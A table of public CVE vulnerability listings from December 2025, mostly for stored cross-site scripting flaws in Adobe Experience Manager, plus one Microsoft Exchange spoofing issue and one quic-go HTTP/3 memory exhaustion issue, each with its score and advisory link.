| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64577 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64578 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64579 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64580 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64581 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64582 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64583 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64585 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64586 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64590 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64591 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64592 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64593 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64594 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64596 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64597 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64598 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64599 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64600 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64601 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64602 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64603 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64604 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64605 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64606 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64607 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64609 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64611 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64612 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64613 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64614 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64615 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64616 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64619 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64620 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64622 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64623 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64626 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64627 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Microsoft--Microsoft Exchange Server Subscription Edition RTM | User interface (ui) misrepresentation of critical information in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2025-12-09 | 5.3 | CVE-2025-64667 | Microsoft Exchange Server Spoofing Vulnerability |
| quic-go--quic-go | quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0. | 2025-12-11 | 5.3 | CVE-2025-64702 | https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6 https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64789 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64790 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64791 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64792 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64793 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64794 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64796 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64797 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64799 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64800 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64801 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64802 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64803 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64804 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64808 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64814 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64817 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64820 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64821 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64822 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64823 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64825 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64826 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64827 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64829 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64833 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64839 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64840 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64841 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64845 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64847 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64850 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64852 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64853 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64857 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
